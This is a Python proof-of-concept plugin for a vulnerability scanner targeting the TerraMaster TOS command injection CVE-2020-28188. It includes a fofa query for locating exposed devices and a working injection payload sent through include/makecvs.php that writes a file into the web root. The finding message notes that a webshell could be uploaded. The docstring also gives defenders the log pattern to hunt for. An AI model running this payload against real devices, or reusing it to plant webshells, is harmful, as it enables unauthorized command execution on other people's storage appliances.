# !/usr/bin/env python3
# @Time    : 2020/12/25
# @Author  : caicai
# @File    : poc_terramaster_rce_cve-2020-28188.py

'''
fofa:
body="TOS Loading" && title!="- CoreAPI"
'''
from myscan.lib.helper.request import request
from myscan.lib.parse.dictdata_parser import dictdata_parser
from myscan.config import scan_set
from myscan.lib.core.common import get_random_str
from myscan.lib.parse.response_parser import response_parser  ##写了一些操作resonse的方法的类
import time


class POC:
    """Directory-level check for the TerraMaster TOS command injection (CVE-2020-28188).

    The check asks ``include/makecvs.php`` to append a random marker to a
    randomly named ``.txt`` file under ``/usr/www/`` and then fetches that file
    back. A finding is recorded only when the marker is returned.

    Notes for operators and defenders:

    * The probe is not read-only. A successful check leaves the marker file in
      the device's web root; nothing in this class removes it.
    * The request it sends (``include/makecvs.php`` with ``|`` / ``&&``
      metacharacters in the ``Event`` parameter) is the pattern to look for in
      web-server logs when hunting for abuse of this endpoint.
    """

    def __init__(self, workdata):
        # Parsed request/response dict handed over by the scanner framework.
        self.dictdata = workdata.get("dictdata")
        # Directory URL under test; per the framework convention it ends with "/".
        self.url = workdata.get("data")
        # Findings: each entry is a dict with name, url, level and detail,
        # where detail is itself a dict (see verify()).
        self.result = []
        self.name = "terramaster_rce"
        self.vulmsg = "link:https://forum.ywhack.com/viewthread.php?tid=114868"
        # NOTE(review): the legend used in this file is 0:Low 1:Medium 2:High,
        # so 3 lies outside it — presumably a higher tier; confirm with the framework.
        self.level = 3

    def verify(self):
        """Run the marker-file check and append a finding to ``self.result`` on success.

        Returns ``None`` in every case; the outcome is communicated through
        ``self.result``.
        """
        # Skip URLs nested deeper than the configured directory limit.
        depth_limit = int(scan_set.get("max_dir", 2)) + 2
        if self.url.count("/") > depth_limit:
            return

        self.parser = dictdata_parser(self.dictdata)

        # Random file name and marker so that a hit cannot come from stale content.
        filename = get_random_str(4) + ".txt"
        marker = get_random_str(10)
        payload = f'http|echo "{marker}" >> /usr/www/{filename} && chmod +x /usr/www/{filename}||'

        write_req = {
            "method": "GET",
            "url": self.url + "include/makecvs.php?Event=" + payload,
            # Certificate validation is off: devices of this kind usually
            # present self-signed certificates.
            "verify": False,
            "timeout": 10,
        }
        write_resp = request(**write_req)
        time.sleep(1)  # short pause before reading the file back

        # The endpoint answers with a CSV header when it handled the request.
        if (
            write_resp is None
            or write_resp.status_code != 200
            or b"Service,DateTime" not in write_resp.content
        ):
            return

        # Same request options, now pointed at the file that should have been created.
        read_req = dict(write_req, url=self.url + filename)
        read_resp = request(**read_req)
        if read_resp is None or marker.encode() not in read_resp.content:
            return

        # Marker came back: the injected command ran. Keep the raw exchange as evidence.
        evidence = response_parser(read_resp)
        finding = {
            "name": self.name,
            "url": self.url,
            "level": self.level,
            "detail": {
                "vulmsg": self.vulmsg,
                "others": "you can upload your webshell",
                "request": evidence.getrequestraw(),
                "response": evidence.getresponseraw(),
            },
        }
        self.result.append(finding)
